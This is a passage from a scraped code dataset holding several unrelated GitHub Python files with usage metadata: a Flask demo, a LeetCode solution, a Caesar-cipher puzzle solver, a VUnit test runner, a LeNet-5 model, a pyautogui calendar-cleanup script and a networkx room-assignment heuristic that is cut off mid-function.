"usage_type": "attribute"}, {"api_name": "torch.ops.aten.add.Tensor", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.add.Tensor", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.clamp.default", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.ops.quantized_decomposed.dequantize_per_tensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 79, "usage_type": "call"}, {"api_name": "torch._inductor.compile_fx.compile_fx", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.allclose", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "1620231330", "text": "import os\n\nfrom flask import Flask, render_template\nfrom flask.ext import assets\nfrom flask_mutatio import Mutatio\n\napp = Flask(__name__)\n\napp = Flask('test_dummy')\napp.config['DEBUG'] = 
True\napp.config['MUTATIO_PORT'] = 27018\napp.config['MUTATIO_TEMPLATE_TAGS'] = ('{@', '@}')\n\nenv = assets.Environment(app)\nenv.load_path = [\n os.path.join(os.path.dirname(__file__), 'static'),\n os.path.join(os.path.dirname(__file__), 'node_modules'),\n]\nenv.register(\n 'js_all',\n assets.Bundle(\n 'jquery/dist/jquery.min.js',\n 'js/bootstrap.min.js',\n assets.Bundle(\n 'coffee/dashboard.coffee',\n filters=['coffeescript']\n ),\n output='js_all.js'\n )\n)\nenv.register(\n 'css_all',\n assets.Bundle(\n 'css/bootstrap.min.css',\n 'css/font-awesome.min.css',\n output='css_all.css',\n )\n)\nmutatio = Mutatio()\nmutatio.init_app(app)\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "exit99/mutatio-python", "sub_path": "demo/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.ext.assets.Environment", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.ext.assets.Bundle", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.ext.assets.Bundle", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.ext.assets.Bundle", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 33, "usage_type": "name"}, {"api_name": "flask_mutatio.Mutatio", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "37283584118", "text": "#\n# @lc app=leetcode id=2014 lang=python3\n#\n# [2014] Longest Subsequence Repeated k Times\n#\n\n# @lc code=start\nfrom collections import deque, Counter\nimport itertools\n\nclass Solution:\n def longestSubsequenceRepeatedK(self, s: str, k: int) -> str:\n\n freq = [0] * 26\n for ch in s: \n freq[ord(ch) - 97] += 1\n \n candidates = [chr(i + 97) for i, v in enumerate(freq) if v >= k]\n\n # def fn(ss):\n # i = cnt = 0\n # for ch in s:\n # if ss[i] == ch:\n # i += 1\n # if i == len(ss):\n # if (cnt := cnt + 1) == k:\n # return True\n # i = 0\n\n def fn(ss):\n t = iter(s)\n return all(c in t for c in ss * k)\n\n ans = \"\"\n queue = deque([\"\"])\n while queue:\n x = queue.popleft()\n for ch in candidates:\n xx = x + ch\n if fn(xx):\n ans = xx\n queue.append(xx)\n\n return ans\n\n # def isSubsequence(s, t):\n # t = iter(t)\n # return all(c in t for c in s)\n\n # hot = \"\".join(el * (freq // k) for el, freq in Counter(s).items()) \n\n # combs = set()\n # for i in range(len(hot) + 1):\n # for candidate in itertools.combinations(hot, i):\n # for perm in itertools.permutations(candidate):\n # combs.add(\"\".join(perm))\n\n 
# combs = sorted(combs, key=lambda x: (len(x), x), reverse=True)\n # for comb in combs:\n # if isSubsequence(comb * k, s):\n # return comb\n\n \n# @lc code=end\n\n", "repo_name": "chenxu0602/LeetCode", "sub_path": "2014.longest-subsequence-repeated-k-times.py", "file_name": "2014.longest-subsequence-repeated-k-times.py", "file_ext": "py", "file_size_in_byte": 1720, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "45260278868", "text": "from collections import Counter\n# message = \"Uijt jt sfbebcmf tusjoh jo Fohmjti!\"\n# message = \"Jveu lezk B9 kf kyv ivri fw kyv tzkp, givgriv wfi srtblg.\"\nmessage = \"Arire tbaan tvir lbh hc, arire tbaan yrg lbh qbja, arire tbaan eha nebhaq naq qrfreg lbh.\"\n\ndef privateEyesOnly(message):\n\tmost_common_letters = Counter(message.replace(' ', '')).most_common(1)\n\tprint(most_common_letters)\n\tfor i in range(len(most_common_letters)):\n\t\tmost_common_letters[i] = most_common_letters[i][0]\n\tmessage = message.split()\n\talphabet = []\n\tcount = 1\n\toffset = None\n\n\tfor letter in range(97, 123):\n\t\talphabet.append((chr(letter), count))\n\t\tcount += 1\n\tprint(alphabet)\n\tdef getNum(letter):\n\t\treturn [index for index in alphabet if index[0] == letter.lower()][0][1]\n\n\tdef getAl(number):\n\t\t# print(number)\n\t\treturn [index for index in alphabet if index[1] == number][0][0]\n\n\tdef decrypt(offset, message):\n\t\tmessage = list(' '.join(message))\n\t\tfor i in range(len(message)):\n\t\t\tif message[i].isalnum():\n\t\t\t\tif not message[i].isdigit():\n\t\t\t\t\tnum = getNum(message[i])\n\t\t\t\t\tnum = num - offset\n\t\t\t\t\tif num < 0:\n\t\t\t\t\t\tnum = 26 + num\n\t\t\t\t\t\n\t\t\t\t\tif message[i].istitle():\n\t\t\t\t\t\tmessage[i] = getAl(num).upper()\n\t\t\t\t\telse:\n\t\t\t\t\t\tmessage[i] = getAl(num)\n\t\t\n\t\treturn ''.join(message)\n\n\t# temp = []\n\t# [temp.append((i, len(i))) for i in message]\n\n\tfor i in message:\n\t\tif len(i) == 1:\n\t\t\tif i.istitle():\n\t\t\t\tnum = getNum(i)\n\t\t\t\toffset = num - 9\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tnum = getNum(i)\n\t\t\t\toffset = num - 1\n\t\t\t\tbreak\n\t\telif len(i) == 2:\n\t\t\tif i[1] in most_common_letters:\n\t\t\t\tprint('using o', i[1])\n\t\t\t\tnum = getNum(i[1])\n\t\t\t\toffset = num - 15\n\t\t\t\tbreak\n\t\t\telif i[0] in most_common_letters:\n\t\t\t\tprint('using i', i[0])\n\t\t\t\tnum = getNum(i[0])\n\t\t\t\toffset = num - 9\n\t\t\t\tbreak\n\t\telif len(i) == 3:\n\t\t\tif i[1] in most_common_letters:\n\t\t\t\tprint('using o', i[1])\n\t\t\t\tnum = getNum(i[1])\n\t\t\t\toffset = num - 15\n\t\t\t\tbreak\n\t\t\telif i[2] in most_common_letters:\n\t\t\t\tprint('using e', i[2])\n\t\t\t\tnum = getNum(i[2])\n\t\t\t\toffset = num - 5\n\t\t\t\tbreak\n\t\n\t\n\tprint(decrypt(offset, message))\n\n\treturn decrypt(offset, message)\n\n\t# print(Counter(message.replace(' ', '')).most_common())\n\n\n# def privateEyesOnly(message):\n# \talphabet = []\n# \tcount = 1\n# \tfor letter in range(97, 123):\n# \t\talphabet.append((chr(letter), count))\n# \t\tcount += 1\n\n# \tword = list(max(message.split(), key=len))\n# \t# print(word)\n# \tprint(alphabet)\n\n# \tfor i in range(len(word)):\n# \t\tword[i] = [index for index in alphabet if index[0] == word[i]][0][1]\n\n\n# \tfor y in range(26):\n# \t\t# del temp[:]\n# \t\ttemp = map(lambda x: x + y, word)\n# \t\ttemp = [i for i in temp]\n# \t\t# print(temp)\n# \t\tfor i in 
range(len(temp)):\n# \t\t\tif temp[i] < len(alphabet):\n# \t\t\t\ttemp[i] = str([index for index in alphabet if index[1] == temp[i]][0][0])\n# \t\t\telif temp[i] - len(alphabet) != 0:\n# \t\t\t\ttemp[i] = temp[i] - len(alphabet)\n# \t\t\t\ttemp[i] = str([index for index in alphabet if index[1] == temp[i]][0][0])\n# \t\t\telse:\n# \t\t\t\ttemp[i] = 'z'\n\n# \t\ttemp = ''.join(temp)\n# \t\tprint(y, temp)\n# \treturn\n\n\n\n\nprivateEyesOnly(message)\n", "repo_name": "CCecilia/codeFights", "sub_path": "challeges/privateEyesOnly.py", "file_name": "privateEyesOnly.py", "file_ext": "py", "file_size_in_byte": 3010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.Counter", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "26626430977", "text": "from pathlib import Path\nfrom itertools import product\nfrom vunit import VUnit\n\nROOT = Path(__file__).parent\n\nUI = VUnit.from_argv()\nUI.add_vhdl_builtins()\nUI.add_random()\nUI.add_verification_components()\n\nLIB = UI.library(\"vunit_lib\")\nLIB.add_source_files(ROOT / \"test\" / \"*.vhd\")\n\n\ndef encode(tb_cfg):\n return \",\".join([\"%s:%s\" % (key, str(tb_cfg[key])) for key in tb_cfg])\n\n\ndef gen_wb_tests(obj, *args):\n for dat_width, num_cycles, strobe_prob, ack_prob, stall_prob, slave_inst in product(*args):\n tb_cfg = dict(\n dat_width=dat_width,\n # TODO remove fixed addr\n adr_width=32,\n strobe_prob=strobe_prob,\n ack_prob=ack_prob,\n stall_prob=stall_prob,\n num_cycles=num_cycles,\n slave_inst=slave_inst,\n )\n config_name = encode(tb_cfg)\n obj.add_config(name=config_name, generics=dict(encoded_tb_cfg=encode(tb_cfg)))\n\n\ndef gen_avalon_tests(obj, *args):\n for data_width, num_cycles, readdatavalid_prob, waitrequest_prob in product(*args):\n tb_cfg = dict(\n data_width=data_width,\n readdatavalid_prob=readdatavalid_prob,\n waitrequest_prob=waitrequest_prob,\n num_cycles=num_cycles,\n )\n config_name = encode(tb_cfg)\n obj.add_config(name=config_name, generics=dict(encoded_tb_cfg=encode(tb_cfg)))\n\n\ndef gen_avalon_master_tests(obj, *args):\n for (\n transfers,\n readdatavalid_prob,\n waitrequest_prob,\n write_prob,\n read_prob,\n ) in product(*args):\n tb_cfg = dict(\n readdatavalid_prob=readdatavalid_prob,\n waitrequest_prob=waitrequest_prob,\n write_prob=write_prob,\n read_prob=read_prob,\n transfers=transfers,\n )\n config_name = encode(tb_cfg)\n obj.add_config(name=config_name, generics=dict(encoded_tb_cfg=encode(tb_cfg)))\n\n\ntb_avalon_slave = LIB.test_bench(\"tb_avalon_slave\")\n\nfor test in tb_avalon_slave.get_tests():\n gen_avalon_tests(test, [32], [1, 2, 64], [1.0, 0.3], [0.0, 0.4])\n\ntb_avalon_master = LIB.test_bench(\"tb_avalon_master\")\n\nfor test in tb_avalon_master.get_tests():\n if test.name == \"wr single rd single\":\n gen_avalon_master_tests(test, [1], [1.0], [0.0], [1.0], [1.0])\n else:\n gen_avalon_master_tests(test, [64], [1.0, 0.3], [0.0, 0.7], [1.0, 0.3], [1.0, 0.3])\n\nTB_WISHBONE_SLAVE = LIB.test_bench(\"tb_wishbone_slave\")\n\nfor test in TB_WISHBONE_SLAVE.get_tests():\n # TODO strobe_prob not implemented in slave tb\n gen_wb_tests(\n test,\n [8, 32],\n [1, 64],\n [1.0],\n [0.3, 1.0],\n [0.4, 0.0],\n [\n True,\n ],\n )\n\n\nTB_WISHBONE_MASTER = LIB.test_bench(\"tb_wishbone_master\")\n\nfor test in TB_WISHBONE_MASTER.get_tests():\n if test.name == \"slave comb ack\":\n gen_wb_tests(\n test,\n [32],\n [64],\n [1.0],\n [1.0],\n [0.0],\n [\n False,\n ],\n )\n else:\n gen_wb_tests(\n test,\n [8, 32],\n [1, 
64],\n [0.3, 1.0],\n [0.3, 1.0],\n [0.4, 0.0],\n [\n True,\n ],\n )\n\n\nTB_AXI_STREAM = LIB.test_bench(\"tb_axi_stream\")\n\nfor id_length in [0, 8]:\n for dest_length in [0, 8]:\n for user_length in [0, 8]:\n for test in TB_AXI_STREAM.get_tests(\"*check\"):\n test.add_config(\n name=\"id_l=%d dest_l=%d user_l=%d\" % (id_length, dest_length, user_length),\n generics=dict(\n g_id_length=id_length,\n g_dest_length=dest_length,\n g_user_length=user_length,\n ),\n )\n\nTB_AXI_STREAM_PROTOCOL_CHECKER = LIB.test_bench(\"tb_axi_stream_protocol_checker\")\n\nfor data_length in [0, 8, 32]:\n for test in TB_AXI_STREAM_PROTOCOL_CHECKER.get_tests(\"*passing*tdata*\"):\n test.add_config(name=\"data_length=%d\" % data_length, generics=dict(data_length=data_length))\n\nfor test in TB_AXI_STREAM_PROTOCOL_CHECKER.get_tests(\"*failing*tid width*\"):\n test.add_config(name=\"dest_length=25\", generics=dict(dest_length=25))\n test.add_config(name=\"id_length=8 dest_length=17\", generics=dict(id_length=8, dest_length=17))\n\nTEST_FAILING_MAX_WAITS = TB_AXI_STREAM_PROTOCOL_CHECKER.test(\n \"Test failing check of that tready comes within max_waits after valid\"\n)\nfor max_waits in [0, 8]:\n TEST_FAILING_MAX_WAITS.add_config(name=\"max_waits=%d\" % max_waits, generics=dict(max_waits=max_waits))\n\nTB_AXI_STREAM.test(\"test random stall on master\").add_config(\n name=\"stall_master\", generics=dict(g_stall_percentage_master=30)\n)\n\nTB_AXI_STREAM.test(\"test random pop stall on slave\").add_config(\n name=\"stall_slave\", generics=dict(g_stall_percentage_slave=30)\n)\n\nTB_AXI_STREAM.test(\"test random check stall on slave\").add_config(\n name=\"stall_slave\", generics=dict(g_stall_percentage_slave=40)\n)\n\nUI.main()\n", "repo_name": "VUnit/vunit", "sub_path": "vunit/vhdl/verification_components/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 5078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 651, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 5, "usage_type": "call"}, {"api_name": "vunit.VUnit.from_argv", "line_number": 7, "usage_type": "call"}, {"api_name": "vunit.VUnit", "line_number": 7, "usage_type": "name"}, {"api_name": "itertools.product", "line_number": 21, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 37, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "39723828471", "text": "\"\"\"\nThe LeNet-5 architecture:\n\n INPUT: 32 x 32\n v\n C1: 6 @ 28 x 28\n v\n S2: 6 @ 14 x 14 (sub-sampling)\n v\n C3: 16 @ 10 x 10\n v\n S4: 16 @ 5 x 5 (sub-sampling)\n v\n C5: 120 @ 1 x 1\n v\n F6: 84 Linear\n v\n OUTPUT: 10 Gaussian\n\"\"\"\n\nimport torch\nfrom torch.nn import Sequential, Module\n\n\nclass C1S2(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Conv2d(1, 6, kernel_size=(5, 5)), # Number of channels = number of feature maps\n torch.nn.ReLU(),\n torch.nn.AvgPool2d(kernel_size=(2, 2), stride=2)\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass C3S4(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Conv2d(6, 16, kernel_size=(5, 5)),\n torch.nn.ReLU(),\n torch.nn.AvgPool2d(kernel_size=(2, 2), stride=2)\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass C5(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Conv2d(16, 120, kernel_size=(5, 5)),\n torch.nn.ReLU()\n )\n\n def forward(self, x):\n return 
self.m(x)\n\n\nclass F6(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(120, 84),\n torch.nn.ReLU(),\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass PyLeNet5(Module):\n def __init__(self):\n super().__init__()\n self.model = Sequential(\n C1S2(),\n C3S4(),\n C5(),\n F6(),\n torch.nn.Linear(84, 10) # OUTPUT layer\n )\n\n def forward(self, x):\n return self.model(x)\n", "repo_name": "tanjeffreyz/lenet-5", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn.Flatten", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "23099776504", "text": "import os\nimport pyautogui as py\nimport time\nimport sys\nimport pyperclip\nimport keyboard\n\ndef click_on(picture_name, x_off=0, y_off=0):\n\timage_location = py.locateOnScreen(picture_name)\n\tif( not image_location ): \n\t\tprint(\"no image, no click\")\n\t\treturn\n\tcenter_x = image_location.left 
+ image_location.width // 2 + x_off\n\tcenter_y = image_location.top + image_location.height // 2 + y_off\n\tprint(\"click on \", center_x, center_y)\n\tpy.leftClick(center_x, center_y)\n\n\ndef need_intervention():\n\tx, y = py.position()\n\tpy.sleep(.1)\n\tpy.hotkey('ctrl', 'a')\n\tpy.sleep(.1)\n\tpy.hotkey('ctrl', 'c')\n\tpy.sleep(.1)\n\tpage_str = pyperclip.paste()\n\tpy.sleep(.1)\n\n\tres = False\n\tif 'gateway.gostudent.org' in page_str:\n\t\tres = True\n\t\tpy.leftClick(1500, 1000)\n\t\treturn res\n\n\n\tpy.leftClick(1500, 1000)\n\tpy.sleep(.1)\n\tpy.press('escape')\n\tpy.sleep(.1)\n\tpy.moveTo(x, y)\n\treturn res\n\ndef modify_title():\n\tpy.hotkey('ctrl', 'a')\n\tpy.sleep(.1)\n\tpy.hotkey('ctrl', 'c')\n\n\tstr = pyperclip.paste()\n\n\tstr = str.split('\\n')[1]\n\n\tprint(\"l1:\", str)\n\n\tstr = str.split('/')[1]\n\n\tnames = str.split(',')\n\n\tname = names[0].strip()#[:-1]\n\tsurname = names[1].strip()\n\n\tprint(name, surname)\n\n\tupdated_name = ''\n\tif name.capitalize() == surname.capitalize():\n\t\tupdated_name = name\n\t\n\telse:\n\t\tupdated_name = name + ' ' + surname\n\t\n\tfor i in range(3): py.leftClick(170, 170) # triple click\n\n\tpyperclip.copy(updated_name)\n\n\tpy.hotkey('ctrl', 'v')\n\n\t\ndef modify_calendar():\n\tclick_on(\"cal.png\", 60)\t\n\tpy.sleep(.2)\n\tclick_on(\"Gs.png\")\n\n\n\n# py.mouseInfo()\n# exit()\n\n\n\nwhile True:\n\tpy.sleep(4)\n\tif not need_intervention():\n\t\tcontinue\n\tpy.sleep(.1)\n\tmodify_title()\n\tpy.sleep(.2)\n\tmodify_calendar()\n\tpy.sleep(.2)\n\tclick_on(\"save.png\")\n\n\n\n\n", "repo_name": "antoineMontier/Computer_control", "sub_path": "GS_Cleaner/goStudentCleaner.py", "file_name": "goStudentCleaner.py", "file_ext": "py", "file_size_in_byte": 1691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyautogui.locateOnScreen", "line_number": 9, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 16, "usage_type": "call"}, {"api_name": "pyautogui.position", "line_number": 20, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 22, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 24, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "pyperclip.paste", "line_number": 26, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 32, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 36, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 38, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 40, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 44, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 46, "usage_type": "call"}, {"api_name": "pyperclip.paste", "line_number": 48, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 70, "usage_type": "call"}, {"api_name": "pyperclip.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", 
"line_number": 74, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 90, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 93, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "29914259180", "text": "import networkx as nx\nimport numpy as np\nimport random\nfrom parse import read_input_file, write_output_file, read_output_file\nfrom utils import is_valid_solution, calculate_happiness, convert_dictionary\nfrom operator import itemgetter\nimport sys\nimport glob\nimport os\nfrom os.path import basename, normpath\n\n\ndef solve(G, s):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n best_D_so_far = {}\n best_k_so_far = 1\n best_H_so_far = 0.0\n n = nx.number_of_nodes(G)\n \n for k in range(1, n + 1):\n curr_D = {}\n smax = s/k\n G_stress = G.copy()\n while nx.number_of_nodes(G_stress) > k: \n # sort edges by decreasing happiness\n sorted_stress = sorted(G_stress.edges(data=True), key=lambda y: (y[2][\"stress\"], -y[2][\"happiness\"]), reverse=False)\n if len(sorted_stress) == 0:\n break\n #need to merge nodes A and B\n n1, n2, _ = sorted_stress[0]\n if G_stress.nodes[n1].get(\"stress\", 0) + G_stress.nodes[n2].get(\"stress\", 0) + G_stress.edges[n1, n2][\"stress\"] <= smax:\n merge(G_stress, n1, n2)\n \n else:\n G_stress.remove_edge(n1,n2)\n \n\n if nx.number_of_nodes(G_stress) == k:\n room = 0\n for node in list(G_stress.nodes):\n if isinstance(node, int):\n temp = [node]\n else:\n temp = node.split(' ')\n temp = [int(x) for x in temp]\n curr_D[room] = temp\n room += 1\n curr_D = convert_dictionary(curr_D)\n \n else:\n continue\n \n if is_valid_solution(curr_D, G, s, k):\n if calculate_happiness(curr_D, G) > best_H_so_far:\n best_D_so_far = curr_D\n best_k_so_far = k\n best_H_so_far = calculate_happiness(curr_D, G)\n #\n # pass\n return best_D_so_far, best_k_so_far\n\ndef solve_kinda(G,s,n=40):\n curMax = 0\n dMax, kMax = 0,0\n for i in range(15):\n d1, k1 = solve_happy(G,s, 0.7)\n d2, k2 = solve_stress(G,s, 0.7)\n h1 = calculate_happiness(d1, G)\n h2 = calculate_happiness(d2, G)\n if max(h1, h2) > curMax:\n if h1 > h2:\n curMax = h1\n dMax, kMax = d1, k1 \n else:\n curMax = h2 \n dMax, kMax = d2, k2\n\n for i in range(15):\n d1, k1 = solve_happy(G,s, 0.35)\n d2, k2 = solve_stress(G,s, 0.35)\n h1 = calculate_happiness(d1, G)\n h2 = calculate_happiness(d2, G)\n if max(h1, h2) > curMax:\n if h1 > h2:\n curMax = h1\n dMax, kMax = d1, k1 \n else:\n curMax = h2 \n dMax, kMax = d2, k2\n\n for i in range(15):\n d1, k1 = solve_happy(G,s, 0.1)\n d2, k2 = solve_stress(G,s, 0.1)\n h1 = calculate_happiness(d1, G)\n h2 = calculate_happiness(d2, G)\n if max(h1, h2) > curMax:\n if h1 > h2:\n curMax = h1\n dMax, kMax = d1, k1 \n else:\n curMax = h2 \n dMax, kMax = d2, k2\n \n return dMax, kMax\n\n\n\n\ndef solve_happy(G, s, prob):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. 
{0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n best_D_so_far = {}\n best_k_so_far = 1\n best_H_so_far = 0.0\n n = nx.number_of_nodes(G)\n \n for k in range(1, n + 1):\n curr_D = {}\n smax = s/k\n G_happy = G.copy()\n while nx.number_of_nodes(G_happy) > k: \n i = np.random.geometric(p=prob, size = 1).item(0)\n # sort edges by decreasing happiness\n sorted_happiness = sorted(G_happy.edges(data=True), key=lambda y: (y[2][\"happiness\"], -y[2][\"stress\"]), reverse=True)\n #i = random.randint(0, len(sorted_happiness))\n if len(sorted_happiness) == 0:\n break\n #need to merge nodes A and B\n i = i % len(sorted_happiness)\n n1, n2, _ = sorted_happiness[i]\n if G_happy.nodes[n1].get(\"stress\", 0) + G_happy.nodes[n2].get(\"stress\", 0) + G_happy.edges[n1, n2][\"stress\"] <= smax:\n merge(G_happy, n1, n2)\n \n else:\n G_happy.remove_edge(n1,n2)\n \n\n if nx.number_of_nodes(G_happy) == k:\n room = 0\n for node in list(G_happy.nodes):\n if isinstance(node, int):\n temp = [node]\n else:\n temp = node.split(' ')\n temp = [int(x) for x in temp]\n curr_D[room] = temp\n room += 1\n curr_D = convert_dictionary(curr_D)\n \n else:\n continue\n \n if is_valid_solution(curr_D, G, s, k):\n if calculate_happiness(curr_D, G) > best_H_so_far:\n best_D_so_far = curr_D\n best_k_so_far = k\n best_H_so_far = calculate_happiness(curr_D, G)\n #\n # pass\n return best_D_so_far, best_k_so_far\n\ndef solve_stress(G, s, prob):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n best_D_so_far = {}\n best_k_so_far = 1\n best_H_so_far = 0.0\n n = nx.number_of_nodes(G)\n \n for k in range(1, n + 1):\n curr_D = {}\n smax = s/k\n G_stress = G.copy()\n while nx.number_of_nodes(G_stress) > k: \n # sort edges by decreasing happiness\n i = 